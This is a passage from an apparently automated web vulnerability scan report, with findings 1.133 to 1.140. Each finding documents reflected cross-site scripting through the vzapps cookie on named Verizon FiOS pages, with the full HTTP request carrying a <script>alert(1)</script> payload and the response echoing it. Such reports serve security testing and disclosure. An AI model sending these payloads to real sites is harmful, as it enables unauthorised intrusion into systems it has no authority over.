Path:	/Residential/aboutFiOS/

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload dfcde<script>alert(1)</script>8f3e3402cf5 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/aboutFiOS/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; ContextInfo_LoopQual=; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; ASPSESSIONIDAASCDDSA=AMLODODCAHPOLKFNKLMMJDCI; RVServiceLocation=TX; refURL=http://www22.verizon.com/residential/bundles/overview#; ASPSESSIONIDCAQADCTB=PGANHBHDNPJFAIJNKAPFDFDH; AIMSPRESESSIONIDSIT=b0fSMnlh2F6rplqPnctyFnvJpZDYjpP4klp2cs58KlQcZdp34GLp!-1715131945!-1272131215; lob=dotcom; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69545525d5f4f58455e445a4a42366a; V347=0; VZGEO=west; ASP.NET_SessionId=kc2rmnitgge3vp55akjq0i45; ak-sf=false; RegistrationApp=SessionId=293e47b8-02f1-4184-8a59-1a5fb423293a; CMS_TimeZoneOffset=360; vzapps=STATE=TXdfcde<script>alert(1)</script>8f3e3402cf5; PageTitle=Livechat; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; ContextInfo_State=TX; Source=Internet; vzAppID=; myservices=vzdock=N; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6ca45525d5f4f58455e445a4a423660; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 70879
Expires: Sat, 20 Nov 2010 02:00:44 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:00:44 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:00:44 GMT; path=/
Set-Cookie: ContextInfo_State=TXdfcde<script>alert(1)</script>8f3e3402cf5; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:00:44 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:00:44 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:00:44 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TXDFCDE<SCRIPT>ALERT(1)</SCRIPT>8F3E3402CF5 </DIV>
...[SNIP]...

1.133. http://www22.verizon.com/Residential/aboutFiOS/Overview.aspx [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/aboutFiOS/Overview.aspx

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 31d72<script>alert(1)</script>0dcf417d564 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/aboutFiOS/Overview.aspx HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; ContextInfo_LoopQual=; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; ASPSESSIONIDAASCDDSA=AMLODODCAHPOLKFNKLMMJDCI; RVServiceLocation=TX; refURL=http://www22.verizon.com/residential/bundles/overview#; ASPSESSIONIDCAQADCTB=PGANHBHDNPJFAIJNKAPFDFDH; AIMSPRESESSIONIDSIT=b0fSMnlh2F6rplqPnctyFnvJpZDYjpP4klp2cs58KlQcZdp34GLp!-1715131945!-1272131215; lob=dotcom; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69545525d5f4f58455e445a4a42366a; V347=0; VZGEO=west; ASP.NET_SessionId=kc2rmnitgge3vp55akjq0i45; ak-sf=false; RegistrationApp=SessionId=293e47b8-02f1-4184-8a59-1a5fb423293a; CMS_TimeZoneOffset=360; vzapps=STATE=TX31d72<script>alert(1)</script>0dcf417d564; PageTitle=Livechat; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; ContextInfo_State=TX; Source=Internet; vzAppID=; myservices=vzdock=N; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6ca45525d5f4f58455e445a4a423660; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 70907
Expires: Sat, 20 Nov 2010 01:44:44 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 01:44:44 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 01:44:44 GMT; path=/
Set-Cookie: ContextInfo_State=TX31d72<script>alert(1)</script>0dcf417d564; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 01:44:44 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 01:44:44 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 01:44:44 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX31D72<SCRIPT>ALERT(1)</SCRIPT>0DCF417D564 </DIV>
...[SNIP]...

1.134. http://www22.verizon.com/Residential/aboutFiOS/Overview.aspx [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/aboutFiOS/Overview.aspx

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 6dd83'><script>alert(1)</script>867907a5873 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/aboutFiOS/Overview.aspx HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; ContextInfo_LoopQual=; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; ASPSESSIONIDAASCDDSA=AMLODODCAHPOLKFNKLMMJDCI; RVServiceLocation=TX; refURL=http://www22.verizon.com/residential/bundles/overview#; ASPSESSIONIDCAQADCTB=PGANHBHDNPJFAIJNKAPFDFDH; AIMSPRESESSIONIDSIT=b0fSMnlh2F6rplqPnctyFnvJpZDYjpP4klp2cs58KlQcZdp34GLp!-1715131945!-1272131215; lob=dotcom; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69545525d5f4f58455e445a4a42366a; V347=0; VZGEO=west; ASP.NET_SessionId=kc2rmnitgge3vp55akjq0i45; ak-sf=false; RegistrationApp=SessionId=293e47b8-02f1-4184-8a59-1a5fb423293a; CMS_TimeZoneOffset=360; vzapps=STATE=TX6dd83'><script>alert(1)</script>867907a5873; PageTitle=Livechat; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; ContextInfo_State=TX; Source=Internet; vzAppID=; myservices=vzdock=N; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6ca45525d5f4f58455e445a4a423660; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 69369
Expires: Sat, 20 Nov 2010 01:44:44 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 01:44:44 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 01:44:43 GMT; path=/
Set-Cookie: ContextInfo_State=TX6dd83'><script>alert(1)</script>867907a5873; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 01:44:44 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 01:44:44 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 01:44:44 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX6DD83'><SCRIPT>ALERT(1)</SCRIPT>867907A5873 ' />
...[SNIP]...

1.135. http://www22.verizon.com/Residential/aboutFiOS/Overview.htm [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/aboutFiOS/Overview.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 1bacd'><script>alert(1)</script>2320ed80ee3 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/aboutFiOS/Overview.htm HTTP/1.1
Host: www22.verizon.com
Proxy-Connection: keep-alive
Referer: http://www22.verizon.com/Residential/aboutFiOS/Overview.htm
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6ca45525d5f4f58455e445a4a423660; V347=0; ASPSESSIONIDAASCDDSA=AMLODODCAHPOLKFNKLMMJDCI; ASP.NET_SessionId=kc2rmnitgge3vp55akjq0i45; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; RegistrationApp=SessionId=293e47b8-02f1-4184-8a59-1a5fb423293a; VZGEO=west; vzAppID=; ASPSESSIONIDCAQADCTB=PGANHBHDNPJFAIJNKAPFDFDH; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69545525d5f4f58455e445a4a42366a; lob=dotcom; myservices=vzdock=N; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; AIMSPRESESSIONIDSIT=b0fSMnlh2F6rplqPnctyFnvJpZDYjpP4klp2cs58KlQcZdp34GLp!-1715131945!-1272131215; AimsChatURL_Cookie=https://collaborateext.verizon.com; CP=null*; PageTitle=Livechat; vzapps=STATE=TX1bacd'><script>alert(1)</script>2320ed80ee3; CMS_TimeZoneOffset=360; refURL=http://www22.verizon.com/Residential/aboutFiOS/Overview.htm

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 69367
Expires: Sat, 20 Nov 2010 01:42:12 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 01:42:12 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 01:42:12 GMT; path=/
Set-Cookie: ContextInfo_State=TX1bacd'><script>alert(1)</script>2320ed80ee3; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 01:42:12 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 01:42:12 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 01:42:12 GMT; path=/
Set-Cookie: ak-sf=false; expires=Sat, 20-Nov-2010 01:47:12 GMT; path=/residential/; domain=verizon.com

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX1BACD'><SCRIPT>ALERT(1)</SCRIPT>2320ED80EE3 ' />
...[SNIP]...

1.136. http://www22.verizon.com/Residential/aboutFiOS/Overview.htm [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/aboutFiOS/Overview.htm

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload a8277<script>alert(1)</script>8964030b879 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/aboutFiOS/Overview.htm HTTP/1.1
Host: www22.verizon.com
Proxy-Connection: keep-alive
Referer: http://www22.verizon.com/Residential/aboutFiOS/Overview.htm
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6ca45525d5f4f58455e445a4a423660; V347=0; ASPSESSIONIDAASCDDSA=AMLODODCAHPOLKFNKLMMJDCI; ASP.NET_SessionId=kc2rmnitgge3vp55akjq0i45; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; RegistrationApp=SessionId=293e47b8-02f1-4184-8a59-1a5fb423293a; VZGEO=west; vzAppID=; ASPSESSIONIDCAQADCTB=PGANHBHDNPJFAIJNKAPFDFDH; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69545525d5f4f58455e445a4a42366a; lob=dotcom; myservices=vzdock=N; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; AIMSPRESESSIONIDSIT=b0fSMnlh2F6rplqPnctyFnvJpZDYjpP4klp2cs58KlQcZdp34GLp!-1715131945!-1272131215; AimsChatURL_Cookie=https://collaborateext.verizon.com; CP=null*; PageTitle=Livechat; vzapps=STATE=TXa8277<script>alert(1)</script>8964030b879; CMS_TimeZoneOffset=360; refURL=http://www22.verizon.com/Residential/aboutFiOS/Overview.htm

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 70905
Expires: Sat, 20 Nov 2010 01:42:12 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 01:42:12 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 01:42:12 GMT; path=/
Set-Cookie: ContextInfo_State=TXa8277<script>alert(1)</script>8964030b879; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 01:42:12 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 01:42:12 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 01:42:12 GMT; path=/
Set-Cookie: ak-sf=false; expires=Sat, 20-Nov-2010 01:47:12 GMT; path=/residential/; domain=verizon.com

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TXA8277<SCRIPT>ALERT(1)</SCRIPT>8964030B879 </DIV>
...[SNIP]...

1.137. http://www22.verizon.com/Residential/aboutFiOS/labs/labs.htm [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/aboutFiOS/labs/labs.htm

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload df322<script>alert(1)</script>ac941ae4822 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/aboutFiOS/labs/labs.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; ContextInfo_LoopQual=; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; ASPSESSIONIDAASCDDSA=AMLODODCAHPOLKFNKLMMJDCI; RVServiceLocation=TX; refURL=http://www22.verizon.com/residential/bundles/overview#; ASPSESSIONIDCAQADCTB=PGANHBHDNPJFAIJNKAPFDFDH; AIMSPRESESSIONIDSIT=b0fSMnlh2F6rplqPnctyFnvJpZDYjpP4klp2cs58KlQcZdp34GLp!-1715131945!-1272131215; lob=dotcom; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69545525d5f4f58455e445a4a42366a; V347=0; VZGEO=west; ASP.NET_SessionId=kc2rmnitgge3vp55akjq0i45; ak-sf=false; RegistrationApp=SessionId=293e47b8-02f1-4184-8a59-1a5fb423293a; CMS_TimeZoneOffset=360; vzapps=STATE=TXdf322<script>alert(1)</script>ac941ae4822; PageTitle=Livechat; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; ContextInfo_State=TX; Source=Internet; vzAppID=; myservices=vzdock=N; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6ca45525d5f4f58455e445a4a423660; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 78163
Expires: Sat, 20 Nov 2010 02:00:05 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:00:05 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:00:05 GMT; path=/
Set-Cookie: ContextInfo_State=TXdf322<script>alert(1)</script>ac941ae4822; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:00:05 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:00:05 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:00:05 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TXDF322<SCRIPT>ALERT(1)</SCRIPT>AC941AE4822 </DIV>
...[SNIP]...

1.138. http://www22.verizon.com/Residential/aboutFiOS/labs/labs.htm [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/aboutFiOS/labs/labs.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload ad9a7'><script>alert(1)</script>c9b242b33c4 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/aboutFiOS/labs/labs.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; ContextInfo_LoopQual=; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; ASPSESSIONIDAASCDDSA=AMLODODCAHPOLKFNKLMMJDCI; RVServiceLocation=TX; refURL=http://www22.verizon.com/residential/bundles/overview#; ASPSESSIONIDCAQADCTB=PGANHBHDNPJFAIJNKAPFDFDH; AIMSPRESESSIONIDSIT=b0fSMnlh2F6rplqPnctyFnvJpZDYjpP4klp2cs58KlQcZdp34GLp!-1715131945!-1272131215; lob=dotcom; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69545525d5f4f58455e445a4a42366a; V347=0; VZGEO=west; ASP.NET_SessionId=kc2rmnitgge3vp55akjq0i45; ak-sf=false; RegistrationApp=SessionId=293e47b8-02f1-4184-8a59-1a5fb423293a; CMS_TimeZoneOffset=360; vzapps=STATE=TXad9a7'><script>alert(1)</script>c9b242b33c4; PageTitle=Livechat; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; ContextInfo_State=TX; Source=Internet; vzAppID=; myservices=vzdock=N; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6ca45525d5f4f58455e445a4a423660; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 78167
Expires: Sat, 20 Nov 2010 02:00:05 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:00:05 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:00:05 GMT; path=/
Set-Cookie: ContextInfo_State=TXad9a7'><script>alert(1)</script>c9b242b33c4; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:00:05 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:00:05 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:00:05 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TXAD9A7'><SCRIPT>ALERT(1)</SCRIPT>C9B242B33C4 ' />
...[SNIP]...

1.139. http://www22.verizon.com/Residential/aboutFiOS/reviews/reviews.htm [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/aboutFiOS/reviews/reviews.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 7d599'><script>alert(1)</script>7fa37470b53 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/aboutFiOS/reviews/reviews.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; ContextInfo_LoopQual=; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; ASPSESSIONIDAASCDDSA=AMLODODCAHPOLKFNKLMMJDCI; RVServiceLocation=TX; refURL=http://www22.verizon.com/residential/bundles/overview#; ASPSESSIONIDCAQADCTB=PGANHBHDNPJFAIJNKAPFDFDH; AIMSPRESESSIONIDSIT=b0fSMnlh2F6rplqPnctyFnvJpZDYjpP4klp2cs58KlQcZdp34GLp!-1715131945!-1272131215; lob=dotcom; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69545525d5f4f58455e445a4a42366a; V347=0; VZGEO=west; ASP.NET_SessionId=kc2rmnitgge3vp55akjq0i45; ak-sf=false; RegistrationApp=SessionId=293e47b8-02f1-4184-8a59-1a5fb423293a; CMS_TimeZoneOffset=360; vzapps=STATE=TX7d599'><script>alert(1)</script>7fa37470b53; PageTitle=Livechat; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; ContextInfo_State=TX; Source=Internet; vzAppID=; myservices=vzdock=N; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6ca45525d5f4f58455e445a4a423660; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 73429
Expires: Sat, 20 Nov 2010 02:00:31 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:00:31 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:00:31 GMT; path=/
Set-Cookie: ContextInfo_State=TX7d599'><script>alert(1)</script>7fa37470b53; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:00:31 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:00:31 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:00:31 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX7D599'><SCRIPT>ALERT(1)</SCRIPT>7FA37470B53 ' />
...[SNIP]...

1.140. http://www22.verizon.com/Residential/aboutFiOS/reviews/reviews.htm [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
